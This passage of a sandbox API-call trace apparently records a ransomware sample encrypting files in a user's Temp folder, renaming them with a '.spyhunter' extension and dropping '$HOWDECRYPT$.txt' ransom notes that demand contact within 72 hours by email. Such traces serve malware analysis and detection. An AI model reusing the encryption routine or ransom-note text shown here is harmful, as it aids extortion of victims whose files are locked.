(in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec6c*=0x30, lpOverlapped=0x0) returned 1 [0153.307] CloseHandle (hObject=0xb0) returned 1 [0153.307] GetProcessHeap () returned 0x2c0000 [0153.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.307] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6dgdmF7ZHw7oTXDfNyyA.png.spyhunter") returned 87 [0153.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6dgdmF7ZHw7oTXDfNyyA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\6dgdmf7zhw7otxdfnyya.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6dgdmF7ZHw7oTXDfNyyA.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\6dgdmf7zhw7otxdfnyya.png.spyhunter")) returned 1 [0153.308] GetProcessHeap () returned 0x2c0000 [0153.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.308] GetProcessHeap () returned 0x2c0000 [0153.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.308] GetProcessHeap () returned 0x2c0000 [0153.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e738 | out: hHeap=0x2c0000) returned 1 [0153.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecb0 | out: pbBuffer=0x57ecb0) returned 1 [0153.308] GetProcessHeap () returned 0x2c0000 [0153.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.308] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eca8*=0x30) returned 1 [0153.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5nEZwuuavM.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5nezwuuavm.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5nEZwuuavM.rtf") returned 67 [0153.308] StrStrW (lpFirst="5nEZwuuavM.rtf", lpSrch=".txt") returned 0x0 [0153.308] GetProcessHeap () returned 0x2c0000 [0153.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.309] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec6c*=0x2800, lpOverlapped=0x0) returned 1 [0153.309] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.309] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec6c*=0x2800, lpOverlapped=0x0) returned 1 [0153.310] GetProcessHeap () returned 0x2c0000 [0153.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.310] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.310] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x57ecac*, lpNumberOfBytesWritten=0x57ec6c*=0x4, lpOverlapped=0x0) returned 1 [0153.310] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec6c*=0x30, lpOverlapped=0x0) returned 1 [0153.310] CloseHandle (hObject=0xb0) returned 1 [0153.310] GetProcessHeap () returned 0x2c0000 [0153.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.310] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5nEZwuuavM.rtf.spyhunter") returned 77 [0153.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5nEZwuuavM.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5nezwuuavm.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5nEZwuuavM.rtf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5nezwuuavm.rtf.spyhunter")) returned 1 [0153.311] GetProcessHeap () returned 0x2c0000 [0153.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.311] GetProcessHeap () returned 0x2c0000 [0153.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.311] GetProcessHeap () returned 0x2c0000 [0153.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e082d8 | out: hHeap=0x2c0000) returned 1 [0153.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eca8 | out: pbBuffer=0x57eca8) returned 1 [0153.311] GetProcessHeap () returned 0x2c0000 [0153.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eca0*=0x30) returned 1 [0153.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5mifbcMJqbczMjc6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5mifbcmjqbczmjc6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.312] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5mifbcMJqbczMjc6.mkv") returned 73 [0153.312] StrStrW (lpFirst="5mifbcMJqbczMjc6.mkv", lpSrch=".txt") returned 0x0 [0153.312] GetProcessHeap () returned 0x2c0000 [0153.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.312] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec64*=0x2800, lpOverlapped=0x0) returned 1 [0153.312] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.313] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec64*=0x2800, lpOverlapped=0x0) returned 1 [0153.313] GetProcessHeap () returned 0x2c0000 [0153.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.313] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.313] WriteFile (in: hFile=0xb0, lpBuffer=0x57eca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x57eca4*, lpNumberOfBytesWritten=0x57ec64*=0x4, lpOverlapped=0x0) returned 1 [0153.313] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec64*=0x30, lpOverlapped=0x0) returned 1 [0153.313] CloseHandle (hObject=0xb0) returned 1 [0153.313] GetProcessHeap () returned 0x2c0000 [0153.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.313] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5mifbcMJqbczMjc6.mkv.spyhunter") returned 83 [0153.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5mifbcMJqbczMjc6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5mifbcmjqbczmjc6.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5mifbcMJqbczMjc6.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5mifbcmjqbczmjc6.mkv.spyhunter")) returned 1 [0153.314] GetProcessHeap () returned 0x2c0000 [0153.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.314] GetProcessHeap () returned 0x2c0000 [0153.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.314] GetProcessHeap () returned 0x2c0000 [0153.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4a18 | out: hHeap=0x2c0000) returned 1 [0153.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eca8 | out: pbBuffer=0x57eca8) returned 1 [0153.315] GetProcessHeap () returned 0x2c0000 [0153.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eca0*=0x30) returned 1 [0153.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5gsrzudCD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5gsrzudcd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5gsrzudCD.mkv") returned 66 [0153.315] StrStrW (lpFirst="5gsrzudCD.mkv", lpSrch=".txt") returned 0x0 [0153.315] GetProcessHeap () returned 0x2c0000 [0153.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.315] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec64*=0x2800, lpOverlapped=0x0) returned 1 [0153.316] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.316] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec64*=0x2800, lpOverlapped=0x0) returned 1 [0153.316] GetProcessHeap () returned 0x2c0000 [0153.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.316] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.317] WriteFile (in: hFile=0xb0, lpBuffer=0x57eca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x57eca4*, lpNumberOfBytesWritten=0x57ec64*=0x4, lpOverlapped=0x0) returned 1 [0153.317] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec64*=0x30, lpOverlapped=0x0) returned 1 [0153.317] CloseHandle (hObject=0xb0) returned 1 [0153.317] GetProcessHeap () returned 0x2c0000 [0153.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.317] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5gsrzudCD.mkv.spyhunter") returned 76 [0153.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5gsrzudCD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5gsrzudcd.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5gsrzudCD.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5gsrzudcd.mkv.spyhunter")) returned 1 [0153.318] GetProcessHeap () returned 0x2c0000 [0153.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.318] GetProcessHeap () returned 0x2c0000 [0153.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.318] GetProcessHeap () returned 0x2c0000 [0153.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08208 | out: hHeap=0x2c0000) returned 1 [0153.318] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eca0 | out: pbBuffer=0x57eca0) returned 1 [0153.318] GetProcessHeap () returned 0x2c0000 [0153.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.318] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec98*=0x30) returned 1 [0153.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0sE-CcH9ai.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0se-cch9ai.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0sE-CcH9ai.jpg") returned 67 [0153.319] StrStrW (lpFirst="0sE-CcH9ai.jpg", lpSrch=".txt") returned 0x0 [0153.319] GetProcessHeap () returned 0x2c0000 [0153.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.319] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec5c*=0x2800, lpOverlapped=0x0) returned 1 [0153.320] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.320] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec5c*=0x2800, lpOverlapped=0x0) returned 1 [0153.320] GetProcessHeap () returned 0x2c0000 [0153.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.320] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.320] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x57ec9c*, lpNumberOfBytesWritten=0x57ec5c*=0x4, lpOverlapped=0x0) returned 1 [0153.320] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec5c*=0x30, lpOverlapped=0x0) returned 1 [0153.320] CloseHandle (hObject=0xb0) returned 1 [0153.320] GetProcessHeap () returned 0x2c0000 [0153.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.320] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0sE-CcH9ai.jpg.spyhunter") returned 77 [0153.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0sE-CcH9ai.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0se-cch9ai.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0sE-CcH9ai.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0se-cch9ai.jpg.spyhunter")) returned 1 [0153.321] GetProcessHeap () returned 0x2c0000 [0153.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.321] GetProcessHeap () returned 0x2c0000 [0153.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.322] GetProcessHeap () returned 0x2c0000 [0153.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e083a8 | out: hHeap=0x2c0000) returned 1 [0153.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.322] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.322] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x57ebd3*, lpNumberOfBytesWritten=0x57ecfc*=0x127, lpOverlapped=0x0) returned 1 [0153.323] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.323] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecfc*=0x2ac, lpOverlapped=0x0) returned 1 [0153.323] CloseHandle (hObject=0xb0) returned 1 [0153.323] GetProcessHeap () returned 0x2c0000 [0153.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4858 | out: hHeap=0x2c0000) returned 1 [0153.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.324] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.324] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebcf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecf8, lpOverlapped=0x0 | out: lpBuffer=0x57ebcf*, lpNumberOfBytesWritten=0x57ecf8*=0x127, lpOverlapped=0x0) returned 1 [0153.325] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.325] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecf8*=0x2ac, lpOverlapped=0x0) returned 1 [0153.325] CloseHandle (hObject=0xb0) returned 1 [0153.325] GetProcessHeap () returned 0x2c0000 [0153.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8dfa8 | out: hHeap=0x2c0000) returned 1 [0153.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.326] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.326] WriteFile (in: hFile=0xb0, lpBuffer=0x57ebcb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x57ebcb*, lpNumberOfBytesWritten=0x57ecf4*=0x127, lpOverlapped=0x0) returned 1 [0153.327] lstrlenA 